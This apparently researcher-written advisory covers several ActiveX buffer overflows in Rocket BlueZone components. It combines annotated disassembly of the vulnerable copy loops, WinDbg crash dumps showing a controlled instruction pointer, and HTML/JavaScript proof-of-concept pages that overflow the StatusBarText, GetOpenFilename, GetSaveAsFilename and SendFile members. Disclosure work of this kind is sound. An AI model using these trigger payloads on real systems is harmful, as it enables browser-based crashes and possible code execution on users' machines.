 1001E44A  FF907C070000              		call	[eax+0000077Ch]
 1001E450  80BDFCFDFFFF00            		cmp	byte ptr [ebp-00000204h],00h
 1001E457  75DD                      		jnz	L1001E436
 1001E459  6814C10310                		push	SSZ1003C114_Untitled
 1001E45E  8D85FCFDFFFF              		lea	eax,[ebp-00000204h]
 1001E464  50                        		push	eax
 1001E465  FF155C300310              		call	[KERNEL32.dll!lstrcpyA]
 1001E46B  EBC9                      		jmp	L1001E436
 1001E46D                           L1001E46D:
 1001E46D  8D85E8FBFFFF              		lea	eax,[ebp-00000418h]
 1001E473  50                        		push	eax
 1001E474  FF15A8300310              		call	[KERNEL32.dll!GetLocalTime]
 1001E47A  6800010000                		push	00000100h
 1001E47F  8D85FCFDFFFF              		lea	eax,[ebp-00000204h]
 1001E485  50                        		push	eax
 1001E486  6800C10310                		push	SSZ1003C100_ddd__MMM_dd_yyyy
 1001E48B  8D85E8FBFFFF              		lea	eax,[ebp-00000418h]
 1001E491  50                        		push	eax
 1001E492  6800000040                		push	40000000h
 1001E497  6800040000                		push	00000400h
 1001E49C  FF15EC300310              		call	[KERNEL32.dll!GetTimeFormatA]
 1001E4A2  EB92                      		jmp	L1001E436
 1001E4A4                           L1001E4A4:
 1001E4A4  80BFC605000000            		cmp	byte ptr [edi+000005C6h],00h
 1001E4AB  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E4B1  7407                      		jz 	L1001E4BA
 1001E4B3  68F4C00310                		push	SSZ1003C0F4_Connected
 1001E4B8  EB72                      		jmp	L1001E52C
 1001E4BA                           L1001E4BA:
 1001E4BA  68E4C00310                		push	SSZ1003C0E4_Disconnected
 1001E4BF  EB6B                      		jmp	L1001E52C
 1001E4C1                           L1001E4C1:
 1001E4C1  68E0C00310                		push	L1003C0E0
 1001E4C6  EB5E                      		jmp	L1001E526
 1001E4C8                           L1001E4C8:
 1001E4C8  8D8DFCFDFFFF              		lea	ecx,[ebp-00000204h]
 1001E4CE  51                        		push	ecx
 1001E4CF  6A08                      		push	00000008h
 1001E4D1  E957FFFFFF                		jmp	L1001E42D
 1001E4D6                           L1001E4D6:
 1001E4D6  83E872                    		sub	eax,00000072h
 1001E4D9  7446                      		jz 	L1001E521
 1001E4DB  48                        		dec	eax
 1001E4DC  741C                      		jz 	L1001E4FA
 1001E4DE  48                        		dec	eax
 1001E4DF  7412                      		jz 	L1001E4F3
 1001E4E1  48                        		dec	eax
 1001E4E2  48                        		dec	eax
 1001E4E3  0F8432FFFFFF              		jz 	L1001E41B
 1001E4E9  48                        		dec	eax
 1001E4EA  7543                      		jnz	L1001E52F
 1001E4EC  68D8C00310                		push	SSZ1003C0D8_Seagull
 1001E4F1  EB33                      		jmp	L1001E526
 1001E4F3                           L1001E4F3:
 1001E4F3  68D0C00310                		push	SSZ1003C0D0_Telnet
 1001E4F8  EB2C                      		jmp	L1001E526
 1001E4FA                           L1001E4FA:
 1001E4FA  8A87C7050000              		mov	al,[edi+000005C7h]
 1001E500  84C0                      		test	al,al
 1001E502  7507                      		jnz	L1001E50B
 1001E504  68BCC00310                		push	SSZ1003C0BC_IBM_3270_Terminal
 1001E509  EB1B                      		jmp	L1001E526
 1001E50B                           L1001E50B:
 1001E50B  3C01                      		cmp	al,01h
 1001E50D  7507                      		jnz	L1001E516
 1001E50F  68A8C00310                		push	SSZ1003C0A8_IBM_5250_Terminal
 1001E514  EB10                      		jmp	L1001E526
 1001E516                           L1001E516:
 1001E516  3C02                      		cmp	al,02h
 1001E518  7515                      		jnz	L1001E52F
 1001E51A  689CC00310                		push	SSZ1003C09C_VT_Terminal
 1001E51F  EB05                      		jmp	L1001E526
 1001E521                           L1001E521:
 1001E521  68AC4A0310                		push	SSZ10034AAC_BlueZone
 1001E526                           L1001E526:
 1001E526  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E52C                           L1001E52C:
 1001E52C  50                        		push	eax
 1001E52D  FFD6                      		call	esi
 1001E52F                           L1001E52F:
 1001E52F  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E535  50                        		push	eax
 1001E536  FF1558310310              		call	[KERNEL32.dll!lstrlenA]
 1001E53C  8BD8                      		mov	ebx,eax
 1001E53E  8B85F8FBFFFF              		mov	eax,[ebp-00000408h]
 1001E544  EB0A                      		jmp	L1001E550
 1001E546                           L1001E546:
 1001E546  8A08                      		mov	cl,[eax]               \
 1001E548  888C1DFCFEFFFF            		mov	[ebp+ebx-00000104h],cl  | <---------------- boom
 1001E54F  43                        		inc	ebx                     |
 1001E550                           L1001E550:                                  |
 1001E550  40                        		inc	eax                     |
 1001E551  40                        		inc	eax                     |
 1001E552  66833800                  		cmp	word ptr [eax],0000h    |
 1001E556  0F8574FEFFFF              		jnz	L1001E3D0              /
 1001E55C                           L1001E55C:
 1001E55C  6800010000                		push	00000100h
 1001E561  8D85FCFBFFFF              		lea	eax,[ebp-00000404h]
 1001E567  50                        		push	eax
 1001E568  6AFF                      		push	FFFFFFFFh
 1001E56A  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E570  50                        		push	eax
 1001E571  6A01                      		push	00000001h
 1001E573  6A00                      		push	00000000h
 1001E575  FF1554310310              		call	[KERNEL32.dll!MultiByteToWideChar]
 1001E57B  8D85FCFBFFFF              		lea	eax,[ebp-00000404h]
 1001E581  50                        		push	eax
 1001E582  FF15A0320310              		call	[OLEAUT32.dll!OLEAUT32.2]
 1001E588  8BF0                      		mov	esi,eax
 1001E58A  8B07                      		mov	eax,[edi]
 1001E58C  56                        		push	esi
 1001E58D  57                        		push	edi
 1001E58E  FF90B8030000              		call	[eax+000003B8h]
 1001E594  56                        		push	esi
 1001E595  FF15A8320310              		call	[OLEAUT32.dll!OLEAUT32.6]
 1001E59B  8B4DFC                    		mov	ecx,[ebp-04h]
 1001E59E  5F                        		pop	edi
 1001E59F  5E                        		pop	esi
 1001E5A0  33CD                      		xor	ecx,ebp
 1001E5A2  33C0                      		xor	eax,eax
 1001E5A4  5B                        		pop	ebx
 1001E5A5  E8A2260100                		call	SUB_L10030C4C
 1001E5AA  C9                        		leave
 1001E5AB  C20800                    		retn	0008h
;----------------------------------------------------------------------------------------------------

Proof of Concept

<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
var x = "";
for (i=0; i<13000; i++){
  x = x + "A";
}
obj.StatusBarText = x;
</script>

WhllObj ActiveX Control GetOpenFilename Method FileFilter Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface, the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of the object's methods and properties, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The ActiveX control offers the GetOpenFilename method; see the typelib:

...
/* DISPID=277 */
	/* VT_BSTR [8] */
	function GetOpenFilename(
		/* VT_VARIANT [12] [in] */ $FileFilter, <-----------------
		/* VT_VARIANT [12] [in] */ $FilterIndex,
		/* VT_VARIANT [12] [in] */ $Title,
		/* VT_VARIANT [12] [in] */ $ButtonText
		)
	{
		/* method GetOpenFilename */
	}
...

This method suffers from a stack-based buffer overflow caused by an overlong FileFilter argument, due to a copy loop inside bzwhll.dll. See the vulnerable code below.

WinDBG shows:
eax=015f0000 ebx=00000000 ecx=0000308c edx=00000041 esi=02c96d64 edi=0321f5b0
eip=031f4883 esp=015ecbf8 ebp=015ecc84 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
bzwhll!DllGetClassObject+0x18dc8:
031f4883 8810            mov     byte ptr [eax],dl          ds:0023:015f0000=4d
0:008> g
(7350.624c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015ec828 ebp=015ec848 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???
Vulnerable code, see bzwhll.dll:
;----------------------------------------------------------------------------------------------------
 100247B0                           L100247B0:
 100247B0  55                        		push	ebp
 100247B1  8DAC2404FBFFFF            		lea	ebp,[esp-000004FCh]
 100247B8  81EC7C050000              		sub	esp,0000057Ch
 100247BE  A1F4EC0410                		mov	eax,[L1004ECF4]
 100247C3  33C5                      		xor	eax,ebp
 100247C5  8985F8040000              		mov	[ebp+000004F8h],eax
 100247CB  8B8504050000              		mov	eax,[ebp+00000504h]
 100247D1  53                        		push	ebx
 100247D2  56                        		push	esi
 100247D3  57                        		push	edi
 100247D4  8945D8                    		mov	[ebp-28h],eax
 100247D7  8B8548050000              		mov	eax,[ebp+00000548h]
 100247DD  33DB                      		xor	ebx,ebx
 100247DF  6802010000                		push	00000102h
 100247E4  8945DC                    		mov	[ebp-24h],eax
 100247E7  8D85F6030000              		lea	eax,[ebp+000003F6h]
 100247ED  53                        		push	ebx
 100247EE  50                        		push	eax
 100247EF  66899DF4030000            		mov	[ebp+000003F4h],bx
 100247F6  E891C40000                		call	jmp_MSVCR80.dll!memset
 100247FB  BED8DB0310                		mov	esi,SSZ1003DBD8_All_Files
 10024800  8DBDF0020000              		lea	edi,[ebp+000002F0h]
 10024806  A5                        		movsd
 10024807  A5                        		movsd
 10024808  A5                        		movsd
 10024809  68F4000000                		push	000000F4h
 1002480E  8D8500030000              		lea	eax,[ebp+00000300h]
 10024814  53                        		push	ebx
 10024815  50                        		push	eax
 10024816  895DE0                    		mov	[ebp-20h],ebx
 10024819  A5                        		movsd
 1002481A  E86DC40000                		call	jmp_MSVCR80.dll!memset
 1002481F  6802010000                		push	00000102h
 10024824  8D85EE010000              		lea	eax,[ebp+000001EEh]
 1002482A  53                        		push	ebx
 1002482B  50                        		push	eax
 1002482C  66899DEC010000            		mov	[ebp+000001ECh],bx
 10024833  E854C40000                		call	jmp_MSVCR80.dll!memset
 10024838  83C424                    		add	esp,00000024h
 1002483B  68E8DB0310                		push	SSZ1003DBE8_Open
 10024840  BFB0F50410                		mov	edi,L1004F5B0
 10024845  57                        		push	edi
 10024846  FF155C300310              		call	[KERNEL32.dll!lstrcpyA]
 1002484C  6683BD080500000A          		cmp	word ptr [ebp+00000508h],000Ah
 10024854  7440                      		jz 	L10024896
 10024856  66399D08050000            		cmp	[ebp+00000508h],bx
 1002485D  7437                      		jz 	L10024896
 1002485F  8D8508050000              		lea	eax,[ebp+00000508h]
 10024865  50                        		push	eax
 10024866  E8CCEDFEFF                		call	SUB_L10013637
 1002486B  59                        		pop	ecx
 1002486C  8945D4                    		mov	[ebp-2Ch],eax
 1002486F  33C9                      		xor	ecx,ecx
 10024871                           L10024871:
 10024871  8B45D4                    		mov	eax,[ebp-2Ch]            \
 10024874  8D3448                    		lea	esi,[eax+ecx*2]           |
 10024877  8A16                      		mov	dl,[esi]                  |
 10024879  80FA2C                    		cmp	dl,2Ch                    |
 1002487C  8D840DF0020000            		lea	eax,[ebp+ecx+000002F0h]   |
 10024883  8810                      		mov	[eax],dl                  | <---------- boom
 10024885  7502                      		jnz	L10024889                 |
 10024887  8818                      		mov	[eax],bl                  |
 10024889                           L10024889:                                    |
 10024889  41                        		inc	ecx                       |
 1002488A  66391E                    		cmp	[esi],bx                  |
 1002488D  75E2                      		jnz	L10024871                /
 1002488F  889C0DF1020000            		mov	[ebp+ecx+000002F1h],bl
 10024896                           L10024896:
 10024896  6683BD180500000A          		cmp	word ptr [ebp+00000518h],000Ah
 1002489E  7413                      		jz 	L100248B3
 100248A0  66399D18050000            		cmp	[ebp+00000518h],bx
 100248A7  740A                      		jz 	L100248B3
 100248A9  0FB68520050000            		movzx	eax,[ebp+00000520h]
 100248B0  8945E0                    		mov	[ebp-20h],eax
 100248B3                           L100248B3:
 100248B3  BE04010000                		mov	esi,00000104h
 100248B8  56                        		push	esi
 100248B9  8D85EC010000              		lea	eax,[ebp+000001ECh]
 100248BF  50                        		push	eax
 100248C0  8D8528050000              		lea	eax,[ebp+00000528h]
 100248C6  50                        		push	eax
 100248C7  E807EEFEFF                		call	SUB_L100136D3
 100248CC  56                        		push	esi
 100248CD  8D8538050000              		lea	eax,[ebp+00000538h]
 100248D3  57                        		push	edi
 100248D4  50                        		push	eax
 100248D5  E8F9EDFEFF                		call	SUB_L100136D3
 100248DA  83C418                    		add	esp,00000018h
 100248DD  8D45CC                    		lea	eax,[ebp-34h]
 100248E0  50                        		push	eax
 100248E1  C745CC08000000            		mov	dword ptr [ebp-34h],00000008h
 100248E8  C745D0FF020000            		mov	dword ptr [ebp-30h],000002FFh
 100248EF  FF1550300310              		call	[COMCTL32.dll!InitCommonControlsEx]
 100248F5  6A4C                      		push	0000004Ch
 100248F7  5F                        		pop	edi
 100248F8  57                        		push	edi
 100248F9  8D4580                    		lea	eax,[ebp-80h]
 100248FC  53                        		push	ebx
 100248FD  50                        		push	eax
 100248FE  E889C30000                		call	jmp_MSVCR80.dll!memset
 10024903  8B45D8                    		mov	eax,[ebp-28h]
 10024906  8B806B560000              		mov	eax,[eax+0000566Bh]
 1002490C  894584                    		mov	[ebp-7Ch],eax
 1002490F  8D85F0020000              		lea	eax,[ebp+000002F0h]
 10024915  89458C                    		mov	[ebp-74h],eax
 10024918  8B45E0                    		mov	eax,[ebp-20h]
 1002491B  894598                    		mov	[ebp-68h],eax
 1002491E  8D85F4030000              		lea	eax,[ebp+000003F4h]
 10024924  89459C                    		mov	[ebp-64h],eax
 10024927  8D85EC010000              		lea	eax,[ebp+000001ECh]
 1002492D  8945B0                    		mov	[ebp-50h],eax
 10024930  83C40C                    		add	esp,0000000Ch
 10024933  8D4580                    		lea	eax,[ebp-80h]
 10024936  50                        		push	eax
 10024937  897D80                    		mov	[ebp-80h],edi
 1002493A  895D88                    		mov	[ebp-78h],ebx
 1002493D  895D90                    		mov	[ebp-70h],ebx
 10024940  895D94                    		mov	[ebp-6Ch],ebx
 10024943  8975A0                    		mov	[ebp-60h],esi
 10024946  895DA4                    		mov	[ebp-5Ch],ebx
 10024949  895DA8                    		mov	[ebp-58h],ebx
 1002494C  895DAC                    		mov	[ebp-54h],ebx
 1002494F  C745B420100800            		mov	dword ptr [ebp-4Ch],00081020h
 10024956  895DBC                    		mov	[ebp-44h],ebx
 10024959  895DC0                    		mov	[ebp-40h],ebx
 1002495C  C745C44E450210            		mov	dword ptr [ebp-3Ch],L1002454E
 10024963  895DC8                    		mov	[ebp-38h],ebx
 10024966  FF15E4330310              		call	[comdlg32.dll!GetOpenFileNameA]
 1002496C  85C0                      		test	eax,eax
 1002496E  7506                      		jnz	L10024976
 10024970  889DF4030000              		mov	[ebp+000003F4h],bl
 10024976                           L10024976:
 10024976  56                        		push	esi
 10024977  8D45E4                    		lea	eax,[ebp-1Ch]
 1002497A  50                        		push	eax
 1002497B  6AFF                      		push	FFFFFFFFh
 1002497D  8D85F4030000              		lea	eax,[ebp+000003F4h]
 10024983  50                        		push	eax
 10024984  6A01                      		push	00000001h
 10024986  53                        		push	ebx
 10024987  FF1554310310              		call	[KERNEL32.dll!MultiByteToWideChar]
 1002498D  8D45E4                    		lea	eax,[ebp-1Ch]
 10024990  50                        		push	eax
 10024991  FF15A0320310              		call	[OLEAUT32.dll!OLEAUT32.2]
 10024997  8B4DDC                    		mov	ecx,[ebp-24h]
 1002499A  8901                      		mov	[ecx],eax
 1002499C  8B8DF8040000              		mov	ecx,[ebp+000004F8h]
 100249A2  5F                        		pop	edi
 100249A3  5E                        		pop	esi
 100249A4  33CD                      		xor	ecx,ebp
 100249A6  33C0                      		xor	eax,eax
 100249A8  5B                        		pop	ebx
 100249A9  E89EC20000                		call	SUB_L10030C4C
 100249AE  81C5FC040000              		add	ebp,000004FCh
 100249B4  C9                        		leave
 100249B5  C24800                    		retn	0048h
;----------------------------------------------------------------------------------------------------

Proof of Concept

<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
var x = "";
for (i=0; i<13000; i++){
    x = x + "A";
}
obj.GetOpenFilename(x,"","","");
</script>

WhllObj ActiveX Control GetSaveAsFilename Method FileFilter Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface, the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of the object's methods and properties, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The ActiveX control offers the GetSaveAsFilename() method; see the typelib:

...
/* DISPID=276 */
	/* VT_BSTR [8] */
	function GetSaveAsFilename(
		/* VT_VARIANT [12] [in] */ $InitialFilename,
		/* VT_VARIANT [12] [in] */ $FileFilter,  <----------------------
		/* VT_VARIANT [12] [in] */ $FilterIndex,
		/* VT_VARIANT [12] [in] */ $Title,
		/* VT_VARIANT [12] [in] */ $ButtonText
		)
	{
		/* method GetSaveAsFilename */
	}
...

This function suffers from a stack-based buffer overflow in the second argument, due to a copy loop inside bzwhll.dll; see the vulnerable code below.

WinDbg shows:
(eec.fd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=015f0000 ebx=00000000 ecx=0000309c edx=00000041 esi=00000104 edi=0324f5b0
eip=0322467d esp=015ecbe4 ebp=015ecc70 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
bzwhll!DllGetClassObject+0x18bc2:
0322467d 8810            mov     byte ptr [eax],dl          ds:0023:015f0000=4d
0:008> g
(eec.fd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015ec814 ebp=015ec834 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???
SEH pointers are overwritten, allowing control of EIP.
Vulnerable code, bzwhll.dll:
;----------------------------------------------------------------------------------------------------
 1002458B                           L1002458B:
 1002458B  55                        		push	ebp
 1002458C  8DAC2400FBFFFF            		lea	ebp,[esp-00000500h]
 10024593  81EC80050000              		sub	esp,00000580h
 10024599  A1F4EC0410                		mov	eax,[L1004ECF4]
 1002459E  33C5                      		xor	eax,ebp
 100245A0  8985FC040000              		mov	[ebp+000004FCh],eax
 100245A6  8B8508050000              		mov	eax,[ebp+00000508h]
 100245AC  53                        		push	ebx
 100245AD  56                        		push	esi
 100245AE  57                        		push	edi
 100245AF  8945D8                    		mov	[ebp-28h],eax
 100245B2  8B855C050000              		mov	eax,[ebp+0000055Ch]
 100245B8  33DB                      		xor	ebx,ebx
 100245BA  6802010000                		push	00000102h
 100245BF  8945E0                    		mov	[ebp-20h],eax
 100245C2  8D85FA030000              		lea	eax,[ebp+000003FAh]
 100245C8  53                        		push	ebx
 100245C9  50                        		push	eax
 100245CA  66899DF8030000            		mov	[ebp+000003F8h],bx
 100245D1  E8B6C60000                		call	jmp_MSVCR80.dll!memset
 100245D6  BED8DB0310                		mov	esi,SSZ1003DBD8_All_Files
 100245DB  8DBDF4020000              		lea	edi,[ebp+000002F4h]
 100245E1  A5                        		movsd
 100245E2  A5                        		movsd
 100245E3  A5                        		movsd
 100245E4  68F4000000                		push	000000F4h
 100245E9  8D8504030000              		lea	eax,[ebp+00000304h]
 100245EF  53                        		push	ebx
 100245F0  50                        		push	eax
 100245F1  895DE4                    		mov	[ebp-1Ch],ebx
 100245F4  A5                        		movsd
 100245F5  E892C60000                		call	jmp_MSVCR80.dll!memset
 100245FA  6802010000                		push	00000102h
 100245FF  8D85F2010000              		lea	eax,[ebp+000001F2h]
 10024605  53                        		push	ebx
 10024606  50                        		push	eax
 10024607  66899DF0010000            		mov	[ebp+000001F0h],bx
 1002460E  E879C60000                		call	jmp_MSVCR80.dll!memset
 10024613  83C424                    		add	esp,00000024h
 10024616  68D0DB0310                		push	SSZ1003DBD0_Save
 1002461B  BFB0F50410                		mov	edi,L1004F5B0
 10024620  57                        		push	edi
 10024621  FF155C300310              		call	[KERNEL32.dll!lstrcpyA]
 10024627  BE04010000                		mov	esi,00000104h
 1002462C  56                        		push	esi
 1002462D  8D85F8030000              		lea	eax,[ebp+000003F8h]
 10024633  50                        		push	eax
 10024634  8D850C050000              		lea	eax,[ebp+0000050Ch]
 1002463A  50                        		push	eax
 1002463B  E893F0FEFF                		call	SUB_L100136D3
 10024640  83C40C                    		add	esp,0000000Ch
 10024643  6683BD1C0500000A          		cmp	word ptr [ebp+0000051Ch],000Ah
 1002464B  7446                      		jz 	L10024693
 1002464D  66399D1C050000            		cmp	[ebp+0000051Ch],bx
 10024654  743D                      		jz 	L10024693
 10024656  8D851C050000              		lea	eax,[ebp+0000051Ch]
 1002465C  50                        		push	eax
 1002465D  E8D5EFFEFF                		call	SUB_L10013637
 10024662  59                        		pop	ecx
 10024663  8945DC                    		mov	[ebp-24h],eax
 10024666  33C9                      		xor	ecx,ecx
 10024668                           L10024668:
 10024668  8B45DC                    		mov	eax,[ebp-24h]             \
 1002466B  8D0448                    		lea	eax,[eax+ecx*2]            |
 1002466E  8A10                      		mov	dl,[eax]                   |
 10024670  80FA2C                    		cmp	dl,2Ch                     |
 10024673  8945D4                    		mov	[ebp-2Ch],eax              |
 10024676  8D840DF4020000            		lea	eax,[ebp+ecx+000002F4h]    |
 1002467D  8810                      		mov	[eax],dl                   | <--------- crash
 1002467F  7502                      		jnz	L10024683                  |
 10024681  8818                      		mov	[eax],bl                   |
 10024683                           L10024683:                                     |
 10024683  8B45D4                    		mov	eax,[ebp-2Ch]              |
 10024686  41                        		inc	ecx                        |
 10024687  663918                    		cmp	[eax],bx                   |
 1002468A  75DC                      		jnz	L10024668                 /
 1002468C  889C0DF5020000            		mov	[ebp+ecx+000002F5h],bl
 10024693                           L10024693:
 10024693  6683BD2C0500000A          		cmp	word ptr [ebp+0000052Ch],000Ah
 1002469B  7413                      		jz 	L100246B0
 1002469D  66399D2C050000            		cmp	[ebp+0000052Ch],bx
 100246A4  740A                      		jz 	L100246B0
 100246A6  0FB68534050000            		movzx	eax,[ebp+00000534h]
 100246AD  8945E4                    		mov	[ebp-1Ch],eax
 100246B0                           L100246B0:
 100246B0  56                        		push	esi
 100246B1  8D85F0010000              		lea	eax,[ebp+000001F0h]
 100246B7  50                        		push	eax
 100246B8  8D853C050000              		lea	eax,[ebp+0000053Ch]
 100246BE  50                        		push	eax
 100246BF  E80FF0FEFF                		call	SUB_L100136D3
 100246C4  56                        		push	esi
 100246C5  8D854C050000              		lea	eax,[ebp+0000054Ch]
 100246CB  57                        		push	edi
 100246CC  50                        		push	eax
 100246CD  E801F0FEFF                		call	SUB_L100136D3
 100246D2  83C418                    		add	esp,00000018h
 100246D5  8D45CC                    		lea	eax,[ebp-34h]
 100246D8  50                        		push	eax
 100246D9  C745CC08000000            		mov	dword ptr [ebp-34h],00000008h
 100246E0  C745D0FF020000            		mov	dword ptr [ebp-30h],000002FFh
 100246E7  FF1550300310              		call	[COMCTL32.dll!InitCommonControlsEx]
 100246ED  6A4C                      		push	0000004Ch
 100246EF  5F                        		pop	edi
 100246F0  57                        		push	edi
 100246F1  8D4580                    		lea	eax,[ebp-80h]
 100246F4  53                        		push	ebx
 100246F5  50                        		push	eax
 100246F6  E891C50000                		call	jmp_MSVCR80.dll!memset
 100246FB  8B45D8                    		mov	eax,[ebp-28h]
 100246FE  8B806B560000              		mov	eax,[eax+0000566Bh]
 10024704  894584                    		mov	[ebp-7Ch],eax
 10024707  8D85F4020000              		lea	eax,[ebp+000002F4h]
 1002470D  89458C                    		mov	[ebp-74h],eax
 10024710  8B45E4                    		mov	eax,[ebp-1Ch]
 10024713  894598                    		mov	[ebp-68h],eax
 10024716  8D85F8030000              		lea	eax,[ebp+000003F8h]
 1002471C  89459C                    		mov	[ebp-64h],eax
 1002471F  8D85F0010000              		lea	eax,[ebp+000001F0h]
 10024725  8945B0                    		mov	[ebp-50h],eax
 10024728  83C40C                    		add	esp,0000000Ch
 1002472B  8D4580                    		lea	eax,[ebp-80h]
 1002472E  50                        		push	eax
 1002472F  897D80                    		mov	[ebp-80h],edi
 10024732  895D88                    		mov	[ebp-78h],ebx
 10024735  895D90                    		mov	[ebp-70h],ebx
 10024738  895D94                    		mov	[ebp-6Ch],ebx
 1002473B  8975A0                    		mov	[ebp-60h],esi
 1002473E  895DA4                    		mov	[ebp-5Ch],ebx
 10024741  895DA8                    		mov	[ebp-58h],ebx
 10024744  895DAC                    		mov	[ebp-54h],ebx
 10024747  C745B420000900            		mov	dword ptr [ebp-4Ch],00090020h
 1002474E  895DBC                    		mov	[ebp-44h],ebx
 10024751  895DC0                    		mov	[ebp-40h],ebx
 10024754  C745C44E450210            		mov	dword ptr [ebp-3Ch],L1002454E
 1002475B  895DC8                    		mov	[ebp-38h],ebx
 1002475E  FF15E0330310              		call	[comdlg32.dll!GetSaveFileNameA]
 10024764  85C0                      		test	eax,eax
 10024766  7506                      		jnz	L1002476E
 10024768  889DF8030000              		mov	[ebp+000003F8h],bl
 1002476E                           L1002476E:
 1002476E  56                        		push	esi
 1002476F  8D45E8                    		lea	eax,[ebp-18h]
 10024772  50                        		push	eax
 10024773  6AFF                      		push	FFFFFFFFh
 10024775  8D85F8030000              		lea	eax,[ebp+000003F8h]
 1002477B  50                        		push	eax
 1002477C  6A01                      		push	00000001h
 1002477E  53                        		push	ebx
 1002477F  FF1554310310              		call	[KERNEL32.dll!MultiByteToWideChar]
 10024785  8D45E8                    		lea	eax,[ebp-18h]
 10024788  50                        		push	eax
 10024789  FF15A0320310              		call	[OLEAUT32.dll!OLEAUT32.2]
 1002478F  8B4DE0                    		mov	ecx,[ebp-20h]
 10024792  8901                      		mov	[ecx],eax
 10024794  8B8DFC040000              		mov	ecx,[ebp+000004FCh]
 1002479A  5F                        		pop	edi
 1002479B  5E                        		pop	esi
 1002479C  33CD                      		xor	ecx,ebp
 1002479E  33C0                      		xor	eax,eax
 100247A0  5B                        		pop	ebx
 100247A1  E8A6C40000                		call	SUB_L10030C4C
 100247A6  81C500050000              		add	ebp,00000500h
 100247AC  C9                        		leave
 100247AD  C25800                    		retn	0058h
;----------------------------------------------------------------------------------------------------

Proof of Concept

<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
var x = "";
for (i=0; i<13000; i++){
    x = x + "A";
}
obj.GetSaveAsFilename("",x,"","","");
</script>

LIPI ActiveX Control SendFile Method Heap Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): True
description: LIPI Class

According to the IObjectSafety interface, the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of the object's methods and properties, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The ActiveX control exposes the SendFile() method; see the typelib:

...
/* DISPID=2 */
	/* VT_I4 [3] */
	function SendFile(
		/* VT_BSTR [8] [in] */ $__MIDL_0014, <------------------------------
		/* VT_BSTR [8] [in] */ $__MIDL_0015
		)
	{
		/* method SendFile */
	}
...

This method suffers from a heap buffer overflow in the first argument because of a dangerous call to a strcat-like function inside bzlipiobj.dll; see the vulnerable code below.
Note that you need to set the ‘Username’ and ‘Password’ properties to avoid a login input box.
When browsing sendfile.html, WinDBG shows:

eax=0c0c0c0c ebx=030a9006 ecx=0c0c0c0c edx=0c0c0c0b esi=030a9006 edi=0c0c0c0c
eip=0c0c0c0c esp=015ec890 ebp=015ec8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
<Unloaded_ring.dll>+0xc0c0bfb:
0c0c0c0c 0c0c            or      al,0Ch

Vulnerable code, bzlipiobj.dll:
;-------------------------------------------------------------------------------
 100200E0  8D8510040000              		lea	eax,[ebp+00000410h]
 100200E6                           L100200E6:
 100200E6  50                        		push	eax
 100200E7  8D83E28E0800              		lea	eax,[ebx+00088EE2h]
 100200ED  50                        		push	eax
 100200EE  FF15F8610210              		call	[KERNEL32.dll!lstrcatA]
 100200F4  EB75                      		jmp	L1002016B
;-------------------------------------------------------------------------------

To reach the call, browse sendfile_crash.html; a login box is shown. Set a breakpoint on KERNEL32.dll!lstrcatA, then click OK.
Proof of Concept

<html>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<script>
//obj.UserName = "aaaaaaaa";
//obj.Password = "bbbbbbbb";
bof = "";
for (i=0; i<15000; i++){
   bof = bof + "!!!!";
}
obj.SendFile(bof,"");
</script>

<html>
<body>
